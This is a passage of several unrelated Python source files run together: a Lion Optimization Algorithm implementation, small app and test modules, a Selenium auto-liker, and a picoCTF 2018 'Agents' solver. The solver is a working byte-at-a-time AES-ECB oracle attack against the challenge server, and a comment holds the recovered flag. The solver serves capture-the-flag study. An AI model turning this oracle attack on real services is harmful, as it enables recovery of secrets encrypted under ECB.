                w = g.tournament_selection(fitnesses, 1, tournament_size)[0]
                # Calculates the distance between agent and winner
                distance = g.euclidean_distance(agent.position, pride[w].position)
                # Generates random numbers
                rand = r.generate_uniform_random_number()
                u = r.generate_uniform_random_number(-1, 1)
                theta = r.generate_uniform_random_number(-np.pi / 6, np.pi / 6)
                # Calculates both `R1` and `R2` vectors:
                # R1 points at the winner, R2 is made orthogonal to R1
                # via Gram-Schmidt (EPSILON guards the zero-norm case)
                R1 = pride[w].position - agent.position
                R2 = np.random.randn(*R1.T.shape)
                R2 = R2.T - R2.dot(R1) * R1 / (np.linalg.norm(R1) ** 2 + c.EPSILON)
                # Updates agent's position (eq. 6)
                agent.position += 2 * distance * rand * R1 + \
                    u * np.tan(theta) * distance * R2
def _roaming(self, prides, function):
    """Performs the roaming procedure (s. 2.2.4).

    Males roam toward the best-known positions of a random subset of
    their pride's territory.

    Args:
        prides (list): List of prides holding their corresponding lions.
        function (Function): A Function object that will be used as the objective function.
    """
    # Iterates through all prides
    for pride in prides:
        # Calculates the number of roaming lions
        # NOTE(review): this uses `P` (the number of prides) as the roaming
        # percentage; the paper presumably intends a dedicated roaming
        # rate — confirm.
        n_roaming = int(len(pride) * self.P)
        # Selects `n_roaming` lions (indices may repeat)
        selected = r.generate_integer_random_number(high=len(pride), size=n_roaming)
        # Iterates through all agents in pride
        for agent in pride:
            # If agent is male
            if not agent.female:
                # Iterates through selected roaming lions
                for s in selected:
                    # Calculates the direction angle
                    theta = r.generate_uniform_random_number(-np.pi / 6, np.pi / 6)
                    # Calculates the distance between selected lion and current one
                    distance = g.euclidean_distance(pride[s].best_position, agent.position)
                    # Generates the step (eq. 10)
                    step = r.generate_uniform_random_number(0, 2 * distance)
                    # Updates the agent's position
                    agent.position += step * np.tan(theta)
                    # Clip the agent's limits
                    agent.clip_by_bound()
                    # Defines the previous fitness and calculates the newer one
                    agent.p_fit = copy.deepcopy(agent.fit)
                    agent.fit = function(agent.position)
                    # If new fitness is better than old one
                    if agent.fit < agent.p_fit:
                        # Updates its best position
                        agent.best_position = copy.deepcopy(agent.position)
def _mating_operator(self, agent, males, function):
    """Wraps the mating operator.

    Blends the mother's position with the average male position using a
    Gaussian mixing factor `beta`, then applies per-variable mutation.

    Args:
        agent (Agent): Current agent.
        males (list): List of males that will be breed.
        function (Function): A Function object that will be used as the objective function.

    Returns:
        A pair of offsprings that resulted from mating.
    """
    # Calculates the males average position
    males_average = np.mean([male.position for male in males], axis=0)
    # Generates a gaussian random number (mean 0.5, std 0.1)
    beta = r.generate_gaussian_random_number(0.5, 0.1)
    # Copies current agent into two offsprings
    a1, a2 = copy.deepcopy(agent), copy.deepcopy(agent)
    # Updates first offspring position (eq. 13)
    a1.position = beta * a1.position + (1 - beta) * males_average
    # Updates second offspring position (eq. 14)
    a2.position = (1 - beta) * a2.position + beta * males_average
    # Iterates though all decision variables
    for j in range(agent.n_variables):
        # Generates random numbers
        r2 = r.generate_uniform_random_number()
        r3 = r.generate_uniform_random_number()
        # If first random number is smaller than mutation probability
        if r2 < self.Mu:
            # Mutates the first offspring
            a1.position[j] = r.generate_uniform_random_number(a1.lb[j], a1.ub[j])
        # If second random number is smaller than mutation probability
        if r3 < self.Mu:
            # Mutates the second offspring
            a2.position[j] = r.generate_uniform_random_number(a2.lb[j], a2.ub[j])
    # Clips both offspring bounds
    a1.clip_by_bound()
    a2.clip_by_bound()
    # Updates first offspring properties
    a1.best_position = copy.deepcopy(a1.position)
    # NOTE(review): both offsprings receive the SAME gender (beta >= 0.5);
    # the reference algorithm presumably assigns opposite genders — confirm.
    a1.female = bool(beta >= 0.5)
    a1.fit = function(a1.position)
    # Updates second offspring properties
    a2.best_position = copy.deepcopy(a2.position)
    a2.female = bool(beta >= 0.5)
    a2.fit = function(a2.position)
    return a1, a2
def _mating(self, prides, function):
    """Generates offsprings from mating (s. 2.2.5).

    Each female mates with probability `Ma`, producing two cubs per
    mating via `_mating_operator`.

    Args:
        prides (list): List of prides holding their corresponding lions.
        function (Function): A Function object that will be used as the objective function.

    Returns:
        Cubs generated from the mating procedure (one list per pride).
    """
    # Creates a list of prides offsprings
    prides_cubs = []
    # Iterates through all prides
    for pride in prides:
        # Creates a list of current pride offsprings
        cubs = []
        # Iterates through all agents in pride
        for agent in pride:
            # If agent is female
            if agent.female:
                # Generates a random number
                r1 = r.generate_uniform_random_number()
                # If random number is smaller than mating probability
                if r1 < self.Ma:
                    # Gathers a list of male lions that belongs to current pride
                    # (the comprehension variable is scoped to the comprehension
                    # and does not clobber the outer `agent` in Python 3)
                    males = [agent for agent in pride if not agent.female]
                    # Performs the mating
                    a1, a2 = self._mating_operator(agent, males, function)
                    # Merges current pride offsprings
                    cubs += [a1, a2]
        # Appends pride offspring into prides list
        prides_cubs.append(cubs)
    return prides_cubs
def _defense(self, nomads, prides, cubs):
"""Performs the defense procedure (s. 2.2.6).
Args:
nomads (list): Nomad lions.
prides (list): List of prides holding their corresponding lions.
cubs (Function): List of cubs holding their corresponding lions.
Returns:
Both updated nomad and pride lions.
"""
# Instantiate lists of new nprides lions
new_prides = []
for pride, cub in zip(prides, cubs):
# Gathers the females and males from current pride
pride_female = [agent for agent in pride if agent.female]
pride_male = [agent for agent in pride if not agent.female]
# Gathers the female and male cubs from current pride
cub_female = [agent for agent in cub if agent.female]
cub_male = [agent for agent in cub if not agent.female]
# Sorts the males from current pride
pride_male.sort(key=lambda x: x.fit)
# Gathers the new pride by merging pride's females, cub's females,
# cub's males and non-beaten pride's males
new_pride = pride_female + cub_female + cub_male + pride_male[:-len(cub_male)]
new_prides.append(new_pride)
# Gathers the new nomads
nomads += pride_male[-len(cub_male):]
return nomads, new_prides
def _nomad_roaming(self, nomads, function):
    """Performs the roaming procedure for nomad lions (s. 2.2.4).

    Each nomad is randomly re-initialized with a probability that grows
    with its distance from the best nomad's fitness.

    Args:
        nomads (list): Nomad lions.
        function (Function): A Function object that will be used as the objective function.
    """
    # Sorts nomads so index 0 holds the best one
    nomads.sort(key=lambda x: x.fit)
    # Iterates through all nomad agents
    for agent in nomads:
        # Gathers the best nomad fitness
        best_fit = nomads[0].fit
        # Calculates the roaming probability (eq. 12); capped at 0.6
        prob = 0.1 + np.minimum(0.5, (agent.fit - best_fit) / (best_fit + c.EPSILON))
        # Generates a random number
        r1 = r.generate_uniform_random_number()
        # If random number is smaller than roaming probability
        if r1 < prob:
            # Iterates through all decision variables
            for j in range(agent.n_variables):
                # Updates the agent's position (eq. 11 - bottom):
                # full re-sampling inside the bounds
                agent.position[j] = r.generate_uniform_random_number(agent.lb[j], agent.ub[j])
        # Clip the agent's limits
        agent.clip_by_bound()
        # Defines the previous fitness and calculates the newer one
        agent.p_fit = copy.deepcopy(agent.fit)
        agent.fit = function(agent.position)
        # If new fitness is better than old one
        if agent.fit < agent.p_fit:
            # Updates its best position
            agent.best_position = copy.deepcopy(agent.position)
def _nomad_mating(self, nomads, function):
    """Generates offsprings from nomad lions mating (s. 2.2.5).

    Unlike pride mating, each female mates with a SINGLE randomly
    selected male.

    Args:
        nomads (list): Nomad lions.
        function (Function): A Function object that will be used as the objective function.

    Returns:
        Updated nomad lions (originals plus any new cubs).
    """
    # Creates a list of offsprings
    cubs = []
    # Iterates through all nomad agents
    for agent in nomads:
        # If agent is female
        if agent.female:
            # Generates a random number
            r1 = r.generate_uniform_random_number()
            # If random number is smaller than mating probability
            if r1 < self.Ma:
                # Gathers a list of male lions that belongs to current pride
                # and samples a random integer (comprehension variable is
                # comprehension-scoped; outer `agent` is untouched)
                males = [agent for agent in nomads if not agent.female]
                # If there is at least a male
                if len(males) > 0:
                    # Gathers a random index
                    idx = r.generate_integer_random_number(high=len(males))
                    # Performs the mating with a single partner
                    a1, a2 = self._mating_operator(agent, [males[idx]], function)
                    # Merges current pride offsprings
                    cubs += [a1, a2]
    # Merges both initial nomads and cubs
    nomads += cubs
    return nomads
def _nomad_attack(self, nomads, prides):
    """Performs the nomad's attacking procedure (s. 2.2.6).

    Each female nomad attacks a random subset of prides; when she beats
    the pride's first male, the two lions exchange populations.

    Bug fix: the original performed the swap on a local variable and a
    slot of a temporary `males` list (`agent, males[0] = ...`), which
    never touched `nomads` or `prides` — the whole procedure was a no-op.
    The swap is now written through the real containers.

    Args:
        nomads (list): Nomad lions.
        prides (list): List of prides holding their corresponding lions.

    Returns:
        Both updated nomad and pride lions.
    """
    # Iterates through all nomads, keeping the index so we can write back
    for n_idx, nomad in enumerate(nomads):
        # Only female nomads attack
        if not nomad.female:
            continue
        # Generates a binary array of prides to be attacked
        attack_prides = r.generate_binary_random_number(self.P)
        # Iterates through every pride
        for i, pride in enumerate(prides):
            # If pride is supposed to be attacked
            if attack_prides[i]:
                # Gathers the indexes of the males in the pride
                male_idxs = [j for j, lion in enumerate(pride) if not lion.female]
                # If there is at least a male
                if male_idxs:
                    m_idx = male_idxs[0]
                    # If current nomad agent is better than male in pride
                    if nomad.fit < pride[m_idx].fit:
                        # Swaps them inside the actual populations
                        nomads[n_idx], pride[m_idx] = (copy.deepcopy(pride[m_idx]),
                                                       copy.deepcopy(nomad))
                        # Continue attacking with the lion now holding the slot
                        nomad = nomads[n_idx]
    return nomads, prides
def _migrating(self, nomads, prides):
    """Performs the nomad's migration procedure (s. 2.2.7).

    A fraction `I` of each pride is sampled; sampled females are copied
    into the nomad population and every sampled lion leaves the pride.

    Args:
        nomads (list): Nomad lions.
        prides (list): List of prides holding their corresponding lions.

    Returns:
        Both updated nomad and pride lions.
    """
    # Creates a list to hold the updated prides
    new_prides = []
    # Iterates through all prides
    for pride in prides:
        # Calculates the number of females to be migrated
        n_migrating = int(len(pride) * self.I)
        # Selects `n_migrating` lions
        # NOTE(review): sampled indices may repeat, so fewer than
        # `n_migrating` distinct lions can be selected — confirm intended.
        selected = r.generate_integer_random_number(high=len(pride), size=n_migrating)
        # Iterates through selected pride lions
        for s in selected:
            # If current agent is female
            if pride[s].female:
                # Migrates the female to nomads and defines its property
                n = copy.deepcopy(pride[s])
                n.nomad = True
                # Appends the new nomad lion to the corresponding list
                nomads.append(n)
        # Appends non-selected lions to the new pride positions
        # (selected males are dropped here too, not only females)
        new_prides.append([agent for i, agent in enumerate(pride) if i not in selected])
    return nomads, new_prides
def _equilibrium(self, nomads, prides, n_agents):
    """Performs the population's equilibrium procedure (s. 2.2.8).

    Trims oversized prides and refills undersized ones with the best
    female nomads so every pride returns to its nominal size.

    Args:
        nomads (list): Nomad lions.
        prides (list): List of prides holding their corresponding lions.
        n_agents (int): Total number of agents in the space.

    Returns:
        Both updated nomad and pride lions.
    """
    # Splits the nomad's population into females and males
    nomad_female = [agent for agent in nomads if agent.female]
    nomad_male = [agent for agent in nomads if not agent.female]
    # Sorts both female and male nomads (best fitness first)
    nomad_female.sort(key=lambda x: x.fit)
    nomad_male.sort(key=lambda x: x.fit)
    # Calculates the correct size of each pride
    correct_pride_size = int((1 - self.N) * n_agents / self.P)
    # Iterates through all prides
    for i in range(self.P):
        # While pride is bigger than the correct size
        while len(prides[i]) > correct_pride_size:
            # Removes an agent from the tail
            del prides[i][-1]
        # While pride is smaller than correct size
        # NOTE(review): raises IndexError if female nomads run out before
        # the pride is filled — confirm the populations guarantee supply.
        while len(prides[i]) < correct_pride_size:
            # Gathers the best female nomad and transform into a pride-based lion
            nomad_female[0].pride = i
            nomad_female[0].nomad = False
            # Appends the female to the pride
            prides[i].append(copy.deepcopy(nomad_female[0]))
            # Removes from the nomads
            del nomad_female[0]
    # Merges both female and male nomads into a single population
    # and sorts its according to their fitness
    nomads = nomad_female + nomad_male
    nomads.sort(key=lambda x: x.fit)
    return nomads, prides
def _check_prides_for_males(self, prides):
    """Checks if there is at least one male per pride.

    Prides left without any male (after defense/migration) get one
    randomly chosen member flipped to male so future mating and roaming
    steps remain valid.

    Args:
        prides (list): List of prides holding their corresponding lions.
    """
    for pride in prides:
        # Count the males currently living in this pride
        n_males = sum(1 for lion in pride if not lion.female)
        if n_males == 0:
            # Promote a randomly chosen lion to male
            chosen = r.generate_integer_random_number(high=len(pride))
            pride[chosen].female = False
def update(self, space, function):
    """Wraps Lion Optimization Algorithm over all agents and variables.

    Runs one full LOA iteration: pride hunting/moving/roaming/mating/
    defense, nomad roaming/mating/attacking, migration and equilibrium,
    then writes the populations back into `space.agents`.

    Args:
        space (Space): Space containing agents and update-related information.
        function (Function): A Function object that will be used as the objective function.
    """
    # Gets nomad and non-nomad (pride) lions
    nomads = self._get_nomad_lions(space.agents)
    prides = self._get_pride_lions(space.agents)
    # Performs the hunting procedure, moving, roaming,
    # mating and defending for pride lions (step 3)
    self._hunting(prides, function)
    self._moving_safe_place(prides)
    self._roaming(prides, function)
    pride_cubs = self._mating(prides, function)
    nomads, prides = self._defense(nomads, prides, pride_cubs)
    # Performs roaming, mating and attacking
    # for nomad lions (step 4)
    self._nomad_roaming(nomads, function)
    nomads = self._nomad_mating(nomads, function)
    nomads, prides = self._nomad_attack(nomads, prides)
    # Migrates females lions from prides (step 5)
    nomads, prides = self._migrating(nomads, prides)
    # Equilibrates the nomads and prides population (step 6)
    nomads, prides = self._equilibrium(nomads, prides, space.n_agents)
    # Checks if there is at least one male per pride
    self._check_prides_for_males(prides)
    # Defines the correct splitting point, so
    # the agents in space can be correctly updated
    correct_nomad_size = int(self.N * space.n_agents)
    # Updates the nomads (any surplus nomads are discarded here)
    space.agents[:correct_nomad_size] = copy.deepcopy(nomads[:correct_nomad_size])
    # Updates the prides (flattened back into a single agent list)
    space.agents[correct_nomad_size:] = copy.deepcopy(
        list(itertools.chain.from_iterable(prides)))
|
#!/usr/bin/env python2
# picoCTF 2018 "Agents" solver: byte-at-a-time secret recovery against an
# AES-ECB encryption oracle (identical 16-byte plaintext blocks produce
# identical ciphertext blocks). Python 2 only: relies on str.decode('hex')
# and the pwntools `remote` API.
from pwn import *
import sys
import string
# Known template the server wraps around the secret agent code.
MSG = """Agent,
Greetings. My situation report is as follows:
My agent identifying code is: .
Down with the Soviets,
006
"""
context.log_level = 'error'
def encrypt(payload):
    # One oracle round-trip: submit a report, return the raw ciphertext bytes.
    r = remote("2018shell.picoctf.com",37131)
    r.recvuntil('Please enter your situation report: ')
    r.sendline(payload)
    cipher = r.recvline().strip().decode('hex')
    r.close()
    return cipher
def getFlagLength():
    # Pad one byte at a time until the ciphertext grows by a block; the
    # number of pad bytes consumed reveals the secret's length once the
    # known template length is subtracted.
    known_len = len(MSG)
    cipher_len = len(encrypt(''))
    padding_len = 0
    while True:
        new_len = len(encrypt((padding_len+1)*'A'))
        if new_len > cipher_len:
            break
        padding_len+=1
    return cipher_len - padding_len - known_len
"""
Agent, Greetings
. My situation r
eport is as foll
ows: XXXXXXXXXXX
fying code is: ?
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
 My agent identi
fying code is: p
icoCTF{@g3nt6_1$
_th3_c00l3$t_128
9389} Down with
the Soviets, 006
"""
def readSecret(secretLength):
    # Offsets of our injected text and of the secret within the full
    # plaintext (see the block layout sketched above).
    injectionOffset = 53
    secretOffset = 84
    alignment1Length = (-injectionOffset)%16 # we want to put knownPlaintext in a new block
    alignment2Length = secretLength+(-secretLength)%16 # just to ensure "real_block_offset" doesn't change later
    newSecretOffset = secretOffset+alignment1Length+16+alignment2Length
    alignment3Length = (15-newSecretOffset)%16 # we want first byte of the secret to be the last byte of previous block
    knownPlaintext = MSG[secretOffset-15:secretOffset]
    fake_block_offset = injectionOffset+alignment1Length
    real_block_offset = newSecretOffset+alignment3Length-15
    secret = ""
    sys.stdout.write("[*] Reading secret...: ")
    for i in range(secretLength):
        # Forge a block of 15 known bytes + 1 guessed byte; when its
        # ciphertext equals the block ending at the next secret byte,
        # the guess is correct.
        for c in string.printable:
            cipher = encrypt('x'*alignment1Length + knownPlaintext + c + 'y'*alignment2Length + 'z'*alignment3Length)
            if cipher[fake_block_offset:fake_block_offset+16]==cipher[real_block_offset:real_block_offset+16]:
                secret += c
                knownPlaintext = knownPlaintext[1:]+c
                alignment2Length -= 1
                sys.stdout.write(c)
                sys.stdout.flush()
                break
    sys.stdout.write("\n")
    sys.stdout.flush()
    return secret
flagLen = getFlagLength()
print("Flag length: %d"%flagLen)
flag = readSecret(flagLen)
print("Flag: %s"%flag)
import attr
from clime import clime
@attr.s(auto_attribs=True)
class Dude:
    """A person with a single attitude: whether they like ice cream."""

    likes_ice_cream: bool = False

    def declare_ice_cream_status(self):
        """Print this dude's ice-cream preference to stdout."""
        if self.likes_ice_cream:
            negate = ""
        else:
            negate = " do not"
        print(f"hi! i{negate} like ice cream")
def main():
    """CLI entry point: clime builds a `Dude` from command-line flags."""
    clime(Dude).declare_ice_cream_status()
if __name__ == "__main__":
    main()
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import fields, models
from odoo.tools.translate import _
class MailingList(models.Model):
    """Extends `mailing.list` with website popups and a subscription toast."""
    _inherit = 'mailing.list'

    def _default_toast_content(self):
        # Default thank-you message; wrapped in `_()` for translation
        return _('<p>Thanks for subscribing!</p>')

    # Popups on the website that subscribe visitors to this list
    website_popup_ids = fields.One2many('website.mass_mailing.popup', 'mailing_list_id', string="Website Popups")
    # HTML shown in the toast after a successful subscription (translatable)
    toast_content = fields.Html(default=_default_toast_content, translate=True)
|
from queue import deque
import numpy as np
class Snake():
    """
    Holds all pertinent information regarding the Snake's movement and body.

    The position of the snake is tracked using a queue that stores the
    positions of the body (oldest segment at the left end).

    Note:
        A potentially more space efficient implementation could track
        directional changes rather than tracking each location of the
        snake's body.
    """

    # Direction constants, clockwise starting at up
    UP = 0
    RIGHT = 1
    DOWN = 2
    LEFT = 3

    def __init__(self, head_coord_start, length=3):
        """
        head_coord_start - tuple, list, or ndarray denoting the starting coordinates for the snake's head
        length - starting number of units in snake's body
        """
        self.direction = self.DOWN
        # Bug fix: `np.int` was removed in NumPy 1.24; the builtin `int`
        # is the documented replacement and yields the same dtype.
        self.head = np.asarray(head_coord_start).astype(int)
        self.head_color = np.array([255, 0, 0], np.uint8)
        self.body = deque()
        # Build the body trailing upwards (decreasing y) from the head so
        # the oldest segment sits at the left end of the deque.
        for i in range(length - 1, 0, -1):
            self.body.append(self.head - np.asarray([0, i]).astype(int))

    def step(self, coord, direction):
        """
        Takes a step in the specified direction from the specified coordinate.

        coord - list, tuple, or numpy array
        direction - integer from 0-3 inclusive.
            0: up
            1: right
            2: down
            3: left
        """
        assert direction < 4 and direction >= 0
        if direction == self.UP:
            return np.asarray([coord[0], coord[1] - 1]).astype(int)
        elif direction == self.RIGHT:
            return np.asarray([coord[0] + 1, coord[1]]).astype(int)
        elif direction == self.DOWN:
            return np.asarray([coord[0], coord[1] + 1]).astype(int)
        else:
            return np.asarray([coord[0] - 1, coord[1]]).astype(int)

    def action(self, direction):
        """
        This method sets a new head coordinate and appends the old head
        into the body queue. The Controller class handles popping the
        last piece of the body if no food is eaten on this step.

        The direction can be any integer value, but will be collapsed
        to 0, 1, 2, or 3 corresponding to up, right, down, left respectively.

        direction - integer from 0-3 inclusive.
            0: up
            1: right
            2: down
            3: left
        """
        # Ensure direction is either 0, 1, 2, or 3
        direction = (int(direction) % 4)
        # Opposite directions differ by exactly 2; reversing is ignored
        if np.abs(self.direction - direction) != 2:
            self.direction = direction

        self.body.append(self.head)
        self.head = self.step(self.head, self.direction)
        return self.head
|
from django.conf.urls import url, include
from App import views
# URL routes for the App: /index/ is served by views.index and is
# reversible via the route name 'index'.
urlpatterns = [
    url(r'^index/',views.index,name='index')
]
from django.http import HttpResponse
def homepage(request):
    """Render a static landing page with links to the project's tools."""
    html = """
    <html>
        <body>
            <h1>Zacni ucit</h1>
            <ul>
                <li><a href="/admin/">Administrace</a></li>
                <li><a href="/" onclick="window.location.port=7474; return false;">Neo4j konzole</a></li>
                <li><a href="/graphql/">GraphQl</a></li>
                <li><a href="https://wiki.cesko.digital/pages/viewpage.action?pageId=1577190">Wiki</a></li>
                <li>Slack <a href="https://cesko-digital.slack.com/archives/C01CDSTV8KF">obecny</a>, <a href="https://cesko-digital.slack.com/archives/C01KFLXMH5Y">vyvojarsky</a></li>
                <li><a href="https://github.com/cesko-digital/zacni-ucit">GitHub</a></li>
            </ul>
        </body>
    </html>
    """
    return HttpResponse(html)
|
import time
from castero.player import Player, PlayerDependencyError
class MPVPlayer(Player):
    """The MPVPlayer class.

    Media player backend built on libmpv through the `mpv` Python binding.
    State codes used below: 0 = stopped, 1 = playing, 2 = paused.
    """
    NAME = "mpv"

    def __init__(self, title, path, episode) -> None:
        """Initializes the object.

        Overrides method from Player; see documentation in that class.
        """
        super().__init__(title, path, episode)

        # Deferred import: keeps the module importable without libmpv;
        # check_dependencies() reports a missing dependency explicitly.
        import mpv
        self.mpv = mpv

    @staticmethod
    def check_dependencies():
        """Checks whether dependencies are met for playing a player.

        Overrides method from Player; see documentation in that class.
        """
        try:
            import mpv
        except OSError:
            # python-mpv raises OSError when the libmpv shared library
            # cannot be loaded
            raise PlayerDependencyError(
                "Dependency mpv not found, which is required for playing"
                " media files"
            )

    def _create_player(self) -> None:
        """Creates the player object while making sure it is a valid file.

        Overrides method from Player; see documentation in that class.
        """
        self._player = self.mpv.Context()
        self._player.initialize()
        # Audio only: disable video track selection
        self._player.set_option('vid', False)
        # Start paused; play() flips this off
        self._player.set_property('pause', True)
        self._player.command('loadfile', self._path)
        # NOTE(review): `Context.time` is not an obvious libmpv property and
        # the `duration` property below re-reads 'duration' lazily — confirm
        # this assignment actually yields the media duration.
        self._duration = self._player.time

    def play(self) -> None:
        """Plays the media.

        Overrides method from Player; see documentation in that class.
        """
        # Lazily create the underlying mpv context on first play
        if self._player is None:
            self._create_player()

        self._player.set_property('pause', False)
        self._state = 1

    def stop(self) -> None:
        """Stops the media.

        Overrides method from Player; see documentation in that class.
        """
        if self._player is not None:
            self._player.shutdown()
            self._state = 0

    def pause(self) -> None:
        """Pauses the media.

        Overrides method from Player; see documentation in that class.
        """
        if self._player is not None:
            self._player.set_property('pause', True)
            self._state = 2

    def seek(self, direction, amount) -> None:
        """Seek forward or backward in the media.

        Overrides method from Player; see documentation in that class.
        """
        assert direction == 1 or direction == -1

        if self._player is not None:
            self._player.command('seek', direction * amount)

    @property
    def duration(self) -> int:
        """int: the duration of the player, in milliseconds"""
        try:
            return self._player.get_property('duration') * 1000
        except self.mpv.MPVError:
            # mpv may not know the duration yet; fall back to 5 seconds
            return 5000

    @property
    def time(self) -> int:
        """int: the current time of the player, in milliseconds"""
        if self._player is not None:
            try:
                return self._player.get_property('playback-time') * 1000
            except self.mpv.MPVError:
                return 0

    @property
    def time_str(self) -> str:
        """str: the formatted time and duration of the player (HH:MM:SS/HH:MM:SS)"""
        result = "00:00:00/00:00:00"
        if self._player is not None:
            time_seconds = int(self.time / 1000)
            length_seconds = int(self.duration / 1000)
            t = time.strftime('%H:%M:%S', time.gmtime(time_seconds))
            d = time.strftime('%H:%M:%S', time.gmtime(length_seconds))
            result = "%s/%s" % (t, d)
        return result
|
# coding=utf-8
# Copyright 2019 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import app
from absl import flags
from absl import logging
import numpy as np
import tensorflow as tf
from axial import config_imagenet32
from axial import config_imagenet64
from axial import datasets
from axial import models
from axial import worker_util
FLAGS = flags.FLAGS

# Command-line interface: session/TPU master address, output directory,
# RNG seed and which ImageNet resolution config to evaluate.
flags.DEFINE_string('master', None, '')
flags.DEFINE_string('logdir', None, '')
flags.DEFINE_integer('seed', 0, '')
flags.DEFINE_string('config', None, 'imagenet32 or imagenet64')
flags.mark_flag_as_required('logdir')
flags.mark_flag_as_required('config')
def main(_):
    """Evaluation entry point: resolve config, seed, build model/dataset, run eval."""
    if FLAGS.config == 'imagenet32':
        config = config_imagenet32.get_config()
    elif FLAGS.config == 'imagenet64':
        config = config_imagenet64.get_config()
    else:
        # Bug fix: the original raised `ValueError(config)`, but `config`
        # is unbound on this branch, so it produced a NameError instead of
        # the intended error about the unsupported flag value.
        raise ValueError(FLAGS.config)
    logging.info('config: {}'.format(config))

    # Seeding for reproducible evaluation
    tf.set_random_seed(FLAGS.seed)
    np.random.seed(FLAGS.seed)

    # Model constructor is deferred so the worker builds it inside its graph
    def model_constructor():
        return getattr(models, config.model_name)(config.model_config)

    # Dataset
    dataset = datasets.get_dataset(config.dataset_name,
                                   **config.dataset_config.values())

    worker_util.run_eval(
        model_constructor=model_constructor,
        logdir=FLAGS.logdir,
        total_bs=config.eval_total_bs,
        master=FLAGS.master,
        input_fn=dataset.eval_input_fn,
        dataset_size=dataset.get_size(is_train=False))


if __name__ == '__main__':
    app.run(main)
|
import retrieve
import validation
from time_functions import time_delay
from selenium.webdriver import ActionChains
def like_pic(browser):
    """Click the like button on the currently open picture."""
    heart = retrieve.like_button(browser)
    time_delay()
    # NOTE(review): clicks when `already_liked(heart)` is truthy — presumably
    # that helper returns True when the pic is NOT yet liked; confirm.
    if validation.already_liked(heart):
        heart.click()
def like_pic_in_feed(browser, number = 1):
    """Like up to `number` pictures in the feed, one per visible like button."""
    loop = 1
    while loop <= number:
        hearts = retrieve.feed_like_buttons(browser)
        for h in range(len(hearts)):
            #print('liking the pic {}'.format(str(self.loop + 1)))
            time_delay()
            # NOTE(review): same assumption as in like_pic — confirm
            # `already_liked` returns True for not-yet-liked buttons.
            if validation.already_liked(hearts[h]):
                # Move to the element before clicking so it is in view
                actions = ActionChains(browser)
                actions.move_to_element(hearts[h])
                actions.click(hearts[h])
                actions.perform()
                loop = loop + 1
            # Stop as soon as the requested number of likes is reached
            if loop > number:
                break
|
import pytest
from prometheus_ecs_discoverer import toolbox
def test_chunk_list_with_even_size():
    """100 items split into chunks of 10 yield exactly 10 full chunks."""
    big_list = list(range(100))
    chunks = toolbox.chunk_list(big_list, 10)
    assert len(chunks) == 10
    for chunk in chunks:
        assert len(chunk) <= 10
def test_chunk_list_with_uneven_size():
    """103 items split into chunks of 10 leave a trailing chunk of 3."""
    big_list = list(range(103))
    chunks = toolbox.chunk_list(big_list, 10)
    assert len(chunks) == 11
    for chunk in chunks:
        assert len(chunk) <= 10
    assert len(chunks[-1]) == 3
def test_extract_set():
    """extract_set deduplicates one attribute across all nested dicts."""
    dct = {
        "descr1": {"att1": "fefefe", "att2": "fefegtrafgrgr"},
        "descr2": {"att1": "OGOGOGO", "att2": "fefegtrafgrgr"},
        "descr3": {"att1": "OGOGOGO", "att2": "fefegtrafgrgr"},
    }
    extract = toolbox.extract_set(dct, "att1")
    assert len(extract) == 2
    assert extract == {"fefefe", "OGOGOGO"}
def test_list_to_dict():
    """list_to_dict keys each element dict by the given attribute's value."""
    lst = [{"key1": "hallo", "key2": "my"}, {"key1": "old", "key2": "friend"}]
    dct = toolbox.list_to_dict(lst, "key1")
    assert dct == {
        "hallo": {"key1": "hallo", "key2": "my"},
        "old": {"key1": "old", "key2": "friend"},
    }
def test_print_structure():
    """pstruct is a smoke test: it must not raise on a list of dicts."""
    lst = [{"key1": "hallo", "key2": "my"}, {"key1": "old", "key2": "friend"}]
    toolbox.pstruct(lst)
    assert True
def test_validate_min_len():
    """validate_min_len raises ValueError only when a collection is too short."""
    lst = [{"this": "dict", "is": "too long"}, {"good": {"dict": "only", "len": "one"}}]
    with pytest.raises(ValueError):
        toolbox.validate_min_len(min_len=10, collections=lst)
    toolbox.validate_min_len(min_len=1, collections=lst)
    assert True
# ------------------------------------------------------------------------------
def test_extract_env_var():
    """extract_env_var finds a named env entry and returns None for misses."""
    container = {
        "random": {"random": "random"},
        "environment": [
            {"name": "PROMETHEUS_PORT", "value": "80"},
            {"name": "SOMETINGELSE", "value": "fefefwe"},
        ],
    }
    assert "80" == toolbox.extract_env_var(container, "PROMETHEUS_PORT")
    assert None is toolbox.extract_env_var(container, "does not exist")
def test_extract_env_var_no_env():
    """extract_env_var returns None when the container has no environment."""
    container = {
        "random": {"random": "random"},
    }
    assert None is toolbox.extract_env_var(container, "PROMETHEUS_PORT")
# ------------------------------------------------------------------------------
def test_extract_env_var_no_environment():
    """Missing 'environment' key plus unknown variable both yield None."""
    container = {"random": {"random": "random"}}
    assert None is toolbox.extract_env_var(container, "does not exist")
|
import csv
import os
import shutil
import sys
import tempfile
import unittest
from pyspark import StorageLevel
from pyspark.sql import Row
from sourced.ml.utils import create_engine, SparkDefault
from sourced.ml.transformers import ParquetSaver, ParquetLoader, Collector, First, \
Identity, FieldsSelector, Repartitioner, DzhigurdaFiles, CsvSaver, Rower, \
PartitionSelector, Sampler, Distinct, Cacher, Ignition, HeadFiles, LanguageSelector, \
UastExtractor, UastDeserializer, UastRow2Document, RepositoriesFilter
from sourced.ml.tests.models import PARQUET_DIR, SIVA_DIR
class BasicTransformerTests(unittest.TestCase):
@classmethod
@unittest.skipUnless(sys.version_info < (3, 7), "Python 3.7 is not yet supported")
def setUpClass(cls):
    """Creates one shared engine/session and a single-partition test RDD."""
    cls.engine = create_engine("test_with_engine", SIVA_DIR, "siva")
    cls.spark = cls.engine.session
    # coalesce(1) pins the fixture to a single partition so partition-count
    # assertions in the tests below are deterministic
    cls.data = ParquetLoader(session=cls.spark, paths=PARQUET_DIR).execute().rdd.coalesce(1)
def test_repartitioner():
    """Repartitioner only grows partition counts when shuffling is enabled."""
    partitions = 2
